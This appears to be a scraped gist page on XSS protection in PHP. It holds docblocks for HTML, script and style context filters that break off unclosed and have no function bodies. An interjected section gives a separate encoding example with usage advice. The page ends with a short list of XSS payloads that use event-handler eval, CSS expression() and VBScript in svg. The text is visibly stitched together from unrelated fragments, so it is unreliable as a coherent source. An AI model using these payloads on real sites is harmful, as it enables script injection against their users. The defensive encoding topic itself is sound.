This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
<?php
/**
 * XSS protection function for HTML context only
 * @usecases
 * <title>use this function if output reflects here or as the content of any HTML tag.</title>
 * e.g., <span>use this function if output reflects here</span>
 * e.g., <div>use this function if output reflects here</div>
 * @description
 * Sanitize/filter < and > so that an attacker cannot leverage them for JavaScript execution.
<!--
/**
 * XSS protection function for script context only
 * @usecases
 * @double quoted JavaScript string literal case e.g.,
 * <script> var searchquery = "use this function if output reflects here"; </script>
 * @single quoted JavaScript string literal case e.g.,
 * <script> var searchquery = 'use this function if output reflects here'; </script>
 * < is filtered because an attacker can prematurely close the script block
 * @description
<!--
/**
 * XSS protection function for style context only
 * @usecases
 * @double quoted case e.g.,
 * <span style="use this function if output reflects here"></span>
 * @single quoted case e.g.,
 * <div style='use this function if output reflects here'></div>
 * OR <style>use this function if output reflects here</style>
 * @description
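As an added example that is not part of this gist (function names and the sample input are my own), here is one way to implement the three context-specific protections the docblocks above describe. Instead of filtering `<` and `>` out, it encodes for each context using PHP's built-in `htmlspecialchars`, `json_encode` with the `JSON_HEX_*` flags, and a CSS hex-escape callback, so that untrusted data can never spell out a tag, close a string literal, or form a CSS function call:

```php
<?php
// Added example, not the gist's code. Function names are assumptions.

/** HTML text/tag-content context (<title>, <span>, <div> ...): encode & < > " ' */
function encodeForHtml(string $input): string
{
    return htmlspecialchars($input, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/**
 * JavaScript string-literal context inside <script>.
 * json_encode emits a complete, quoted JS string literal; JSON_HEX_TAG turns
 * < and > into \u003C / \u003E, so "</script>" cannot be reached from data,
 * and JSON_HEX_QUOT / JSON_HEX_APOS keep the literal from being closed early.
 * U+2028/U+2029 line terminators are escaped by json_encode by default.
 */
function encodeForJsString(string $input): string
{
    $literal = json_encode(
        $input,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
    );
    // Invalid UTF-8 makes json_encode return false: fail closed with an empty literal.
    return $literal === false ? '""' : $literal;
}

/**
 * CSS value context (style="..." or <style>): keep only [A-Za-z0-9] and
 * backslash-hex-escape every other code point. Parentheses, quotes, braces
 * and < become escapes inside an identifier, so expression(...) or </style>
 * cannot be formed.
 */
function encodeForCss(string $input): string
{
    $escaped = preg_replace_callback(
        '/[^A-Za-z0-9]/u',
        static function (array $m): string {
            // CSS hex escape: backslash, code point in hex, trailing space as delimiter
            return sprintf('\\%X ', mb_ord($m[0], 'UTF-8'));
        },
        $input
    );
    return $escaped ?? '';
}

// Constructed sample input that tries to break out of each of the three contexts.
$untrusted = '"</script><b>x</b>\'';

echo '<span>' . encodeForHtml($untrusted) . "</span>\n";
// Note: no surrounding quotes in the template; encodeForJsString supplies them.
echo '<script>var searchquery = ' . encodeForJsString($untrusted) . ";</script>\n";
echo '<div style="font-family:' . encodeForCss($untrusted) . '"></div>' . "\n";
```

Two points worth keeping in mind when using something like this: the JavaScript encoder returns the whole literal including its quotes, so the template must not wrap it in quotes a second time; and the HTML encoder covers only the tag-content context the first docblock names, not attributes whose value is a URL or an event handler, which need their own handling.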
`xss <javascript:alert%28location%29>`_
<div style="color:rgb(''�x:expression(alert(1))"></div>
<img/src=%00 id=confirm(1) onerror=eval(id)
<div id=confirm(1) onmouseover=eval(id)>X</div>
<span/onmouseover=confirm(1)>X</span>
<svg/contentScriptType=text/vbs><script>Execute(MsgBox(chr(88)&chr(83)&chr(83)))